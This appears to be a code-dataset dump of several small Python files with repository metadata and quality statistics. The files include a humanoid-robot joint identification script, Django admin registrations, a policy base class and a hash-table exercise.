time.sleep(5.0)
time.sleep(staticTime)
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
def identify_lhp_dynamic(traj_gen,mode='constAcc',N=3,times=[5.0,4.0,3.0]):
(joint, min_pos, max_pos) = ('lhp', -1.7, 0.6)
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
traj_gen.moveJoint('lsp',-1.57,5.0)
traj_gen.moveJoint('rsp',-1.57,5.0)
traj_gen.moveJoint('le',-1.57,5.0)
traj_gen.moveJoint('re',-1.57,5.0)
traj_gen.moveJoint('lhr',+0.2,5.0)
time.sleep(5.0 + 0.5)
doNCycles(traj_gen,joint,min_pos, max_pos,N,times,mode)
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
#(-0.0349066, 2.61799); #// left knee ********************************
def identify_lk_static(traj_gen,staticTime=60.0):
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
traj_gen.moveJoint('lhp',-1.57,5.0)
traj_gen.moveJoint('lk',1.57,5.0)
time.sleep(5.0 + 0.5)
time.sleep(staticTime)
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
def identify_lk_dynamic(traj_gen,mode='constAcc',N=3,times=[5.0,4.0,3.0]):
(joint, min_pos, max_pos) = ('lk', 0., 2.5)
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
traj_gen.moveJoint('lhp',-1.57,5.0)
time.sleep(5.0 + 0.5)
doNCycles(traj_gen,joint,min_pos, max_pos,N,times,mode)
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
#(-1.309, 0.733038); #// left ankle pitch *************************
def identify_lap_static(traj_gen,staticTime=60.0):
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
traj_gen.moveJoint('lhp',-1.57,5.0)
traj_gen.moveJoint('lk',1.57,5.0)
time.sleep(5.0 + 0.5)
time.sleep(staticTime)
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
def identify_lap_dynamic(traj_gen,mode='constAcc',N=3,times=[5.0,4.0,3.0]):
(joint, min_pos, max_pos) = ('lap', -1.2, 0.6)
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
traj_gen.moveJoint('lhp',-1.57,5.0)
traj_gen.moveJoint('lk',1.57,5.0)
time.sleep(5.0 + 0.5)
doNCycles(traj_gen,joint,min_pos, max_pos,N,times,mode)
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
#(-0.349066, 0.610865); #// left ankle roll ******************INVERTED
def identify_lar_static(traj_gen,staticTime=60.0):
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
traj_gen.moveJoint('lhp',-1.57,5.0)
traj_gen.moveJoint('lk',1.57,5.0)
time.sleep(5.0 + 0.5)
time.sleep(staticTime)
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
def identify_lar_dynamic(traj_gen,mode='constAcc',N=3,times=[5.0,4.0,3.0]):
(joint, min_pos, max_pos) = ('lar', +0.25, -0.5)
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
traj_gen.moveJoint('lhp',-1.57,5.0)
traj_gen.moveJoint('lk',1.57,5.0)
time.sleep(5.0 + 0.5)
doNCycles(traj_gen,joint,min_pos, max_pos,N,times,mode)
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
def identify_tp_dynamic(traj_gen,mode='constAcc',N=3,times=[5.0,4.0,3.0,2.5]):
(joint, min_pos, max_pos) = ('tp', 0., 1.)
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
doNCycles(traj_gen,joint,min_pos, max_pos,N,times,mode)
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
def identify_ty_dynamic(traj_gen,mode='constAcc',N=3,times=[5.0,4.0,3.0,2.5]):
(joint, min_pos, max_pos) = ('ty', -0.7, 0.7)
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
traj_gen.moveJoint('lsp',-1.57,5.0)
traj_gen.moveJoint('rsp',-1.57,5.0)
time.sleep(5.0 + 0.5)
doNCycles(traj_gen,joint,min_pos, max_pos,N,times,mode)
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
def go_to_zero_position(traj_gen,T=10.0):
# Python interpreter can't deal with input(..) ??
# ret = input('Are you sure you want to put the robot in zero position? All joints will move: [y/N]')
# if ret!="y" :
# print('Cancel zero position')
# return
#put the robot in position q0
# RLEG TO 0 **********************
traj_gen.moveJoint('rhy',0.0,T) #0
traj_gen.moveJoint('rhr',0.0,T) #1
traj_gen.moveJoint('rhp',0.0,T) #2
traj_gen.moveJoint('rk' ,0.0,T) #3
traj_gen.moveJoint('rap',0.0,T) #4
traj_gen.moveJoint('rar',0.0,T) #5
# LLEG TO 0 **********************
traj_gen.moveJoint('lhy',0.0,T) #6
traj_gen.moveJoint('lhr',0.0,T) #7
traj_gen.moveJoint('lhp',0.0,T) #8
traj_gen.moveJoint('lk' ,0.0,T) #9
traj_gen.moveJoint('lap',0.0,T) #10
traj_gen.moveJoint('lar',0.0,T) #11
# TORSO TO 0
traj_gen.moveJoint('ty' ,0.0,T) #12
traj_gen.moveJoint('tp' ,0.0,T) #13
# HEAD TO 0
traj_gen.moveJoint('hy' ,0.0,T) #14
traj_gen.moveJoint('hp' ,0.0,T) #15
# RARM TO 0 **********************
traj_gen.moveJoint('rsp',0.0,T) #16
traj_gen.moveJoint('rsr',0.0,T) #17
traj_gen.moveJoint('rsy',0.0,T) #18
traj_gen.moveJoint('re' ,0.0,T) #19
traj_gen.moveJoint('rwy',0.0,T) #20
traj_gen.moveJoint('rwp',0.0,T) #21
traj_gen.moveJoint('rh' ,0.3,T) #22
# LARM TO 0 **********************
traj_gen.moveJoint('lsp',0.0,T) #23
traj_gen.moveJoint('lsr',0.0,T) #24
traj_gen.moveJoint('lsy',0.0,T) #25
traj_gen.moveJoint('le' ,0.0,T) #26
traj_gen.moveJoint('lwy',0.0,T) #27
traj_gen.moveJoint('lwp',0.0,T) #28
traj_gen.moveJoint('lh' ,0.3,T) #29
def deleteDatFilesInTmp():
call('rm /tmp/*.dat',shell=True)
def stopTracerAndCopyFiles(tracer,directory):
tracer.stop()
tracer.dump()
time.sleep(2.0)
call('mkdir ' + directory, shell=True)
call('mv /tmp/*.dat ' + directory, shell=True)
#deleteDatFilesInTmp()
#tracer = start_tracer(robot, estimator, torque_ctrl, traj_gen, ctrl_manager, inv_dyn, None)
#do your experiment here
#stopTracerAndCopyFiles(tracer,directory='/tmp/JOINT0_ID_static')
| 34.091811
| 104
| 0.635417
| 2,647
| 13,739
| 3.123536
| 0.081602
| 0.047896
| 0.100387
| 0.105104
| 0.737784
| 0.711297
| 0.705975
| 0.704644
| 0.704644
| 0.704282
| 0
| 0.102211
| 0.144043
| 13,739
| 402
| 105
| 34.176617
| 0.60085
| 0.108159
| 0
| 0.60472
| 0
| 0
| 0.041534
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.097345
| false
| 0
| 0.011799
| 0.00295
| 0.115044
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
0a2679d176765c89b3dbefd3621038828bc8384c
| 202
|
py
|
Python
|
watch_list/admin.py
|
Llona/aj-mywatch
|
e25835cd98bcb546de5a12d74e20824616ec76dc
|
[
"CC0-1.0"
] | 1
|
2017-10-20T07:27:50.000Z
|
2017-10-20T07:27:50.000Z
|
watch_list/admin.py
|
Llona/aj-mywatch
|
e25835cd98bcb546de5a12d74e20824616ec76dc
|
[
"CC0-1.0"
] | null | null | null |
watch_list/admin.py
|
Llona/aj-mywatch
|
e25835cd98bcb546de5a12d74e20824616ec76dc
|
[
"CC0-1.0"
] | null | null | null |
from django.contrib import admin
from watch_list.models import Anime, WatchState, News
# Register your models here.
admin.site.register(Anime)
admin.site.register(WatchState)
admin.site.register(News)
| 25.25
| 53
| 0.816832
| 29
| 202
| 5.655172
| 0.517241
| 0.164634
| 0.310976
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.094059
| 202
| 7
| 54
| 28.857143
| 0.896175
| 0.128713
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.4
| 0
| 0.4
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
0a414886a17091f215172ada8e75b1c7d3678b65
| 41
|
py
|
Python
|
conftest.py
|
kylewm/redwind
|
7ad807b5ab2dd74a8d470dbea9dd4baf5567d9c6
|
[
"BSD-2-Clause"
] | 35
|
2015-01-08T03:26:39.000Z
|
2020-09-16T00:42:17.000Z
|
conftest.py
|
kylewm/redwind
|
7ad807b5ab2dd74a8d470dbea9dd4baf5567d9c6
|
[
"BSD-2-Clause"
] | 47
|
2015-01-05T23:22:08.000Z
|
2021-02-02T21:43:26.000Z
|
conftest.py
|
kylewm/redwind
|
7ad807b5ab2dd74a8d470dbea9dd4baf5567d9c6
|
[
"BSD-2-Clause"
] | 10
|
2015-02-20T00:51:37.000Z
|
2022-01-11T10:59:32.000Z
|
# lets py.test set the proper PYTHONPATH
| 20.5
| 40
| 0.780488
| 7
| 41
| 4.571429
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.170732
| 41
| 1
| 41
| 41
| 0.941176
| 0.926829
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
0a5f04fac091e7f6b131e0722181b4a3339e69d8
| 26
|
py
|
Python
|
HelloWorld/HelloWorld/__init__.py
|
gp2-why/AI-
|
a2048ad9de4c9a806c1d1437c63548a1f941b71e
|
[
"MIT"
] | null | null | null |
HelloWorld/HelloWorld/__init__.py
|
gp2-why/AI-
|
a2048ad9de4c9a806c1d1437c63548a1f941b71e
|
[
"MIT"
] | null | null | null |
HelloWorld/HelloWorld/__init__.py
|
gp2-why/AI-
|
a2048ad9de4c9a806c1d1437c63548a1f941b71e
|
[
"MIT"
] | null | null | null |
import sqlparse
sqlparse.
| 8.666667
| 15
| 0.846154
| 3
| 26
| 7.333333
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.115385
| 26
| 3
| 16
| 8.666667
| 0.956522
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.5
| null | null | 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
6a75d7a612a0b65cbc41700d99738451d8385f2b
| 44
|
py
|
Python
|
python3/runner/__init__.py
|
digiaonline/python_koans
|
e6264b70a32c6af5d55806cacae37cace363a0b4
|
[
"MIT"
] | 1
|
2020-09-23T06:33:59.000Z
|
2020-09-23T06:33:59.000Z
|
python3/runner/__init__.py
|
digiaonline/python_koans
|
e6264b70a32c6af5d55806cacae37cace363a0b4
|
[
"MIT"
] | null | null | null |
python3/runner/__init__.py
|
digiaonline/python_koans
|
e6264b70a32c6af5d55806cacae37cace363a0b4
|
[
"MIT"
] | 1
|
2020-09-22T11:33:22.000Z
|
2020-09-22T11:33:22.000Z
|
#!/usr/bin/env python
# Namespace: runner
| 8.8
| 21
| 0.681818
| 6
| 44
| 5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.159091
| 44
| 4
| 22
| 11
| 0.810811
| 0.863636
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
6a8c9e2e25b7619a993ba6834bb1a7b2880f7554
| 159
|
py
|
Python
|
shop/basketapp/admin.py
|
SmirnoffRD/django_hw
|
442e8739937db56aac613c2c3d8d1956cde6fe53
|
[
"MIT"
] | null | null | null |
shop/basketapp/admin.py
|
SmirnoffRD/django_hw
|
442e8739937db56aac613c2c3d8d1956cde6fe53
|
[
"MIT"
] | null | null | null |
shop/basketapp/admin.py
|
SmirnoffRD/django_hw
|
442e8739937db56aac613c2c3d8d1956cde6fe53
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
from .models import Basket, OrderItem
admin.site.register(Basket)
admin.site.register(OrderItem)
# Register your models here.
| 26.5
| 37
| 0.81761
| 22
| 159
| 5.909091
| 0.545455
| 0.138462
| 0.261538
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.100629
| 159
| 5
| 38
| 31.8
| 0.909091
| 0.163522
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
6a92b28a35eb20eb4d11318c0e7bd52261cf7f06
| 96
|
py
|
Python
|
print_odds.py
|
sookoor/PythonInterviewPrep
|
f9862511560894dba39cd06bb82996d1c9d695c6
|
[
"MIT"
] | null | null | null |
print_odds.py
|
sookoor/PythonInterviewPrep
|
f9862511560894dba39cd06bb82996d1c9d695c6
|
[
"MIT"
] | null | null | null |
print_odds.py
|
sookoor/PythonInterviewPrep
|
f9862511560894dba39cd06bb82996d1c9d695c6
|
[
"MIT"
] | null | null | null |
def print_odds(max_num):
print [i for i in xrange(1, max_num + 1) if i % 2]
print_odds(99)
| 19.2
| 54
| 0.65625
| 21
| 96
| 2.809524
| 0.619048
| 0.305085
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.066667
| 0.21875
| 96
| 4
| 55
| 24
| 0.72
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 1
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 5
|
6a9c1f3066528aed9af0973a52f1330988cfffdf
| 287
|
py
|
Python
|
tracking_arm/custom_segmentation/__init__.py
|
NehilDanis/markerless_motion_capture_for_RUSS
|
30f66cea723181f122f15ff861f49d29c8559c95
|
[
"MIT"
] | null | null | null |
tracking_arm/custom_segmentation/__init__.py
|
NehilDanis/markerless_motion_capture_for_RUSS
|
30f66cea723181f122f15ff861f49d29c8559c95
|
[
"MIT"
] | null | null | null |
tracking_arm/custom_segmentation/__init__.py
|
NehilDanis/markerless_motion_capture_for_RUSS
|
30f66cea723181f122f15ff861f49d29c8559c95
|
[
"MIT"
] | 3
|
2021-10-04T13:33:51.000Z
|
2021-11-02T13:54:18.000Z
|
from custom_segmentation.ArmDataLoader import SegmentationDataset
from custom_segmentation.data_handler import get_dataloader_sep_folder, get_dataloader_single_folder
from custom_segmentation.Deeplabv3_pretrained import createDeepLabv3
from custom_segmentation.trainer import train_model
| 71.75
| 100
| 0.926829
| 34
| 287
| 7.441176
| 0.558824
| 0.158103
| 0.347826
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.00738
| 0.055749
| 287
| 4
| 101
| 71.75
| 0.926199
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
6ac1188b44ba7394fe1783332c6ae964200c6b0f
| 110
|
py
|
Python
|
utils/measure/light_controller/errors.py
|
KrzysztofHajdamowicz/homeassistant-powercalc
|
374312e21d1c21b28984990442ec56fc52177f4e
|
[
"MIT"
] | 219
|
2021-06-12T20:55:57.000Z
|
2022-03-30T07:56:43.000Z
|
utils/measure/light_controller/errors.py
|
KrzysztofHajdamowicz/homeassistant-powercalc
|
374312e21d1c21b28984990442ec56fc52177f4e
|
[
"MIT"
] | 420
|
2021-06-09T20:22:03.000Z
|
2022-03-31T15:35:45.000Z
|
utils/measure/light_controller/errors.py
|
KrzysztofHajdamowicz/homeassistant-powercalc
|
374312e21d1c21b28984990442ec56fc52177f4e
|
[
"MIT"
] | 84
|
2021-06-09T18:18:03.000Z
|
2022-03-29T09:28:06.000Z
|
class LightControllerError(Exception):
pass
class ModelNotDiscoveredError(LightControllerError):
pass
| 22
| 52
| 0.818182
| 8
| 110
| 11.25
| 0.625
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.127273
| 110
| 5
| 53
| 22
| 0.9375
| 0
| 0
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.5
| 0
| 0
| 0.5
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 5
|
6ac15251bf4a96249d36a5e3128eab9cb3cd094d
| 83
|
py
|
Python
|
test.py
|
stormalf/file_transfer
|
66fc542931a150bf38732f7d95a0a5e5557fd22e
|
[
"MIT"
] | null | null | null |
test.py
|
stormalf/file_transfer
|
66fc542931a150bf38732f7d95a0a5e5557fd22e
|
[
"MIT"
] | null | null | null |
test.py
|
stormalf/file_transfer
|
66fc542931a150bf38732f7d95a0a5e5557fd22e
|
[
"MIT"
] | null | null | null |
from pySendFile import send_file
send_file(filename="mytext2.txt", testing=True)
| 16.6
| 47
| 0.807229
| 12
| 83
| 5.416667
| 0.833333
| 0.246154
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.013333
| 0.096386
| 83
| 4
| 48
| 20.75
| 0.853333
| 0
| 0
| 0
| 0
| 0
| 0.13253
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
6ace24f1f83ffcda84de5ee85cb66da8a7c3bab5
| 453
|
py
|
Python
|
hw1/cs285/policies/base_policy.py
|
erfanMhi/Deep-Reinforcement-Learning-CS285-Pytroch
|
6da04f367e52a451c202ae7e5477994c1d149baf
|
[
"MIT"
] | 91
|
2020-06-13T16:26:42.000Z
|
2022-03-31T02:49:30.000Z
|
hw1/cs285/policies/base_policy.py
|
erfanMhi/Deep-Reinforcement-Learning-CS285-Pytroch
|
6da04f367e52a451c202ae7e5477994c1d149baf
|
[
"MIT"
] | 6
|
2020-07-26T15:44:36.000Z
|
2022-02-10T02:15:10.000Z
|
hw1/cs285/policies/base_policy.py
|
erfanMhi/Deep-Reinforcement-Learning-CS285-Pytroch
|
6da04f367e52a451c202ae7e5477994c1d149baf
|
[
"MIT"
] | 16
|
2020-08-04T01:17:45.000Z
|
2022-02-24T04:51:41.000Z
|
import numpy as np
class BasePolicy(object):
def __init__(self, **kwargs):
super(BasePolicy, self).__init__(**kwargs)
def build_graph(self):
raise NotImplementedError
def get_action(self, obs):
raise NotImplementedError
def update(self, obs, acs):
raise NotImplementedError
def save(self, filepath):
raise NotImplementedError
def restore(self, filepath):
raise NotImplementedError
| 20.590909
| 49
| 0.679912
| 48
| 453
| 6.208333
| 0.5
| 0.402685
| 0.362416
| 0.241611
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.238411
| 453
| 22
| 50
| 20.590909
| 0.863768
| 0
| 0
| 0.357143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.428571
| false
| 0
| 0.071429
| 0
| 0.571429
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 5
|
6ad00d2c5f1a96b155c88ce776c514d4bc9958e9
| 130
|
py
|
Python
|
base/services.py
|
gucciwu/cycling-cap-pyrenees
|
66f62dc5c074029801cddde3319a507d8c182374
|
[
"MIT"
] | null | null | null |
base/services.py
|
gucciwu/cycling-cap-pyrenees
|
66f62dc5c074029801cddde3319a507d8c182374
|
[
"MIT"
] | null | null | null |
base/services.py
|
gucciwu/cycling-cap-pyrenees
|
66f62dc5c074029801cddde3319a507d8c182374
|
[
"MIT"
] | null | null | null |
import random
NICK_NAME_LIST = ["望尘莫及", "不见后背", "追风侠", "一意孤行"]
def random_nickname():
return random.choice(NICK_NAME_LIST)
| 16.25
| 48
| 0.7
| 18
| 130
| 4.777778
| 0.722222
| 0.186047
| 0.27907
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.146154
| 130
| 7
| 49
| 18.571429
| 0.774775
| 0
| 0
| 0
| 0
| 0
| 0.115385
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0.25
| 0.25
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 5
|
6ae14262202db1c416494f94eed1042e771c31e9
| 167
|
py
|
Python
|
datasets/__init__.py
|
jrounds/EvadeML-Zoo
|
a0d44e649f71e3a66b5acf6094ca33d2f4514105
|
[
"MIT"
] | null | null | null |
datasets/__init__.py
|
jrounds/EvadeML-Zoo
|
a0d44e649f71e3a66b5acf6094ca33d2f4514105
|
[
"MIT"
] | null | null | null |
datasets/__init__.py
|
jrounds/EvadeML-Zoo
|
a0d44e649f71e3a66b5acf6094ca33d2f4514105
|
[
"MIT"
] | null | null | null |
from .datasets_utils import *
from .mnist import MNISTDataset
from .cifar10 import CIFAR10Dataset
from .imagenet import ImageNetDataset
#from .svhn import SVHNDataset
| 27.833333
| 37
| 0.838323
| 20
| 167
| 6.95
| 0.6
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.027211
| 0.11976
| 167
| 5
| 38
| 33.4
| 0.918367
| 0.173653
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
0aa8b7a1a9cece790172f54f51215b9f85965126
| 74
|
py
|
Python
|
plc/__init__.py
|
eric-cgn/plc
|
16a26a3b0cf844bd42ed4554b7d24d8c0a55685a
|
[
"CC0-1.0"
] | null | null | null |
plc/__init__.py
|
eric-cgn/plc
|
16a26a3b0cf844bd42ed4554b7d24d8c0a55685a
|
[
"CC0-1.0"
] | null | null | null |
plc/__init__.py
|
eric-cgn/plc
|
16a26a3b0cf844bd42ed4554b7d24d8c0a55685a
|
[
"CC0-1.0"
] | null | null | null |
from .plc import PLC, ICommand, Dimmer
__all__ = [PLC, ICommand, Dimmer]
| 18.5
| 38
| 0.72973
| 10
| 74
| 5
| 0.6
| 0.44
| 0.68
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.162162
| 74
| 3
| 39
| 24.666667
| 0.806452
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
0ab9b97b750f1101834ad28200c124851e75ef9e
| 129
|
py
|
Python
|
multilabel.py
|
shohan4556/school-budgeting-with-ML
|
0802197bd21ce7f19b06a4d97ee2e16276a6950b
|
[
"MIT"
] | null | null | null |
multilabel.py
|
shohan4556/school-budgeting-with-ML
|
0802197bd21ce7f19b06a4d97ee2e16276a6950b
|
[
"MIT"
] | null | null | null |
multilabel.py
|
shohan4556/school-budgeting-with-ML
|
0802197bd21ce7f19b06a4d97ee2e16276a6950b
|
[
"MIT"
] | null | null | null |
version https://git-lfs.github.com/spec/v1
oid sha256:8ff8ccdfbbddda863f6948cdd4f419aaf016de1f267d15971f2979834bf9d41b
size 3204
| 32.25
| 75
| 0.883721
| 13
| 129
| 8.769231
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.349594
| 0.046512
| 129
| 3
| 76
| 43
| 0.577236
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
7c68897f8c99bea102bc91a2064a776d33efae00
| 277
|
py
|
Python
|
hash_tables/following_patterns.py
|
nickaigi/automatic-dollop
|
eb8222475c7871c1d5710242c5aed8c70ea0d2c8
|
[
"Unlicense"
] | null | null | null |
hash_tables/following_patterns.py
|
nickaigi/automatic-dollop
|
eb8222475c7871c1d5710242c5aed8c70ea0d2c8
|
[
"Unlicense"
] | null | null | null |
hash_tables/following_patterns.py
|
nickaigi/automatic-dollop
|
eb8222475c7871c1d5710242c5aed8c70ea0d2c8
|
[
"Unlicense"
] | null | null | null |
def are_following_patterns(strings, patterns):
return len(set(strings)) == len(set(patterns)) == len(set(zip(strings, patterns)))
if __name__ == '__main__':
strings = ['cat', 'dog', 'dog']
patterns = ['a', 'b', 'b']
are_following_patterns(strings, patterns)
| 27.7
| 86
| 0.646209
| 34
| 277
| 4.911765
| 0.470588
| 0.269461
| 0.239521
| 0.323353
| 0.419162
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.162455
| 277
| 9
| 87
| 30.777778
| 0.719828
| 0
| 0
| 0
| 0
| 0
| 0.072202
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.166667
| false
| 0
| 0
| 0.166667
| 0.333333
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 5
|
6b0e3625756dede51552d436b4f10721989e9f05
| 79
|
py
|
Python
|
rapidminer/__init__.py
|
ruturajnene/rapidminer-conda-package
|
6f5cb00914dca6f5968b42d7312034aba37156f4
|
[
